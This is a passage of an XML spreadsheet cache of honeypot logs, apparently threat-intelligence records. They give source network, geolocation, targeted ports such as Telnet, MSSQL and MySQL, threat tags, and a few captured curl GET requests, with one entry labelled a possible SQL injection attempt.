    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Tiruppur"/>
    <s v="Udumalaippettai"/>
    <s v="1253944"/>
    <s v="NA"/>
    <s v="10.5855"/>
    <s v="77.2513"/>
    <s v="141509"/>
    <s v="Uteleservices"/>
    <s v="Uteleservices"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2020-12-23"/>
    <s v="UTEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a0:d821"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3566"/>
    <x v="3566"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:39:10"/>
    <d v="2024-12-17T16:56:25"/>
    <d v="2025-04-02T11:39:10"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Ludhiana"/>
    <s v="1264728"/>
    <s v="141001"/>
    <s v="30.8915"/>
    <s v="75.802"/>
    <s v="133661"/>
    <s v="Netplus Broadband Services Private Limited"/>
    <s v="Netplus Broadband Services Private Limited"/>
    <s v="residential"/>
    <s v="Broadband Pacenet (I) Pvt. Ltd"/>
    <s v="2006-06-22"/>
    <s v="NETPLUS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d259:3d22"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3567"/>
    <x v="3567"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:37:50"/>
    <d v="2025-04-02T11:37:50"/>
    <d v="2025-04-02T11:37:50"/>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e:1ec"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3568"/>
    <x v="3568"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:29:15"/>
    <d v="2025-04-02T11:08:01"/>
    <d v="2025-04-02T11:29:15"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ef7:680f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3569"/>
    <x v="3569"/>
    <s v="NA&amp;&amp;220-135-152-21.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T11:29:05"/>
    <d v="2024-04-13T05:42:04"/>
    <d v="2025-04-02T11:29:05"/>
    <n v="18233"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;4605&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;35635"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:9815"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3570"/>
    <x v="3570"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:23:08"/>
    <d v="2025-04-02T11:22:17"/>
    <d v="2025-04-02T11:23:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="True"/>
    <s v="vpn"/>
    <s v="medium"/>
    <s v="['anonymous-proxy']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm"/>
    <s v="2673730"/>
    <s v="100 04"/>
    <s v="59.3293"/>
    <s v="18.0686"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="business"/>
    <s v="Mullvad VPN AB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:aa3e:64b5"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3571"/>
    <x v="3571"/>
    <s v="220-134-169-142.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:22:13"/>
    <d v="2024-12-16T04:47:13"/>
    <d v="2025-04-02T11:22:13"/>
    <n v="239"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;80"/>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login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:a98e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3572"/>
    <x v="3572"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:14:29"/>
    <d v="2024-05-21T16:45:30"/>
    <d v="2025-04-02T11:14:29"/>
    <n v="5126"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;44809&amp;&amp;54809&amp;&amp;53465&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS Tamilnadu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa5:db09"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3573"/>
    <x v="3573"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T10:48:52"/>
    <d v="2025-03-13T08:58:25"/>
    <d v="2025-04-02T10:48:52"/>
    <n v="143"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="New Century InfoComm Tech. Co., Ltd"/>
    <s v="residential"/>
    <s v="New Century InfoComm Tech. Co., Ltd."/>
    <s v="2011-04-07"/>
    <s v="NCICNET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6a6b:d4d6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3574"/>
    <x v="3574"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T10:36:27"/>
    <d v="2023-12-03T12:01:00"/>
    <d v="2025-04-02T10:36:27"/>
    <n v="629"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;46749&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1182"/>
    <s v="120.679"/>
    <s v="4780"/>
    <s v="Digital United Inc."/>
    <s v="TINP"/>
    <s v="residential"/>
    <s v="New Century InfoComm Tech. Co., Ltd."/>
    <s v="2010-01-27"/>
    <s v="NCICNET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afb7:2097"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3575"/>
    <x v="3575"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T10:29:46"/>
    <d v="2025-04-02T10:11:25"/>
    <d v="2025-04-02T10:29:46"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:99a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3576"/>
    <x v="3576"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T10:26:13"/>
    <d v="2024-05-23T08:27:24"/>
    <d v="2025-04-02T10:26:13"/>
    <n v="116"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;55965&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="BA"/>
    <s v="Bali"/>
    <s v="Kabupaten Klungkung"/>
    <s v="Banjar Lebah"/>
    <s v="7083756"/>
    <s v="NA"/>
    <s v="-8.53059"/>
    <s v="115.405"/>
    <s v="140426"/>
    <s v="Pemerintah Kabupaten Klungkung"/>
    <s v="Pemerintah Kabupaten Klungkung"/>
    <s v="business"/>
    <s v="Pemerintah Kabupaten Klungkung"/>
    <s v="2020-06-08"/>
    <s v="IDNIC-KLUNGKUNGKAB-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6798:761"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Malicious activity detected, possible SQL injection attempt to access Microsoft SQL database. This could be an attacker trying to exploit vulnerabilities or inject malicious code. It suggests unauthorized access attempts to sensitive database information."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="3577"/>
    <x v="3577"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T10:21:34"/>
    <d v="2025-04-02T10:21:34"/>
    <d v="2025-04-02T10:21:34"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:6924"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3578"/>
    <x v="3578"/>
    <s v="NA&amp;&amp;59-126-217-65.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T10:11:02"/>
    <d v="2024-12-15T09:27:20"/>
    <d v="2025-04-02T10:11:02"/>
    <n v="488"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;29440"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3b7e:d941"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3579"/>
    <x v="3579"/>
    <s v="1-34-65-133.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T09:53:45"/>
    <d v="2024-03-13T12:51:08"/>
    <d v="2025-04-02T09:53:45"/>
    <n v="619"/>
    <s v="SQTK_GTDN"/>
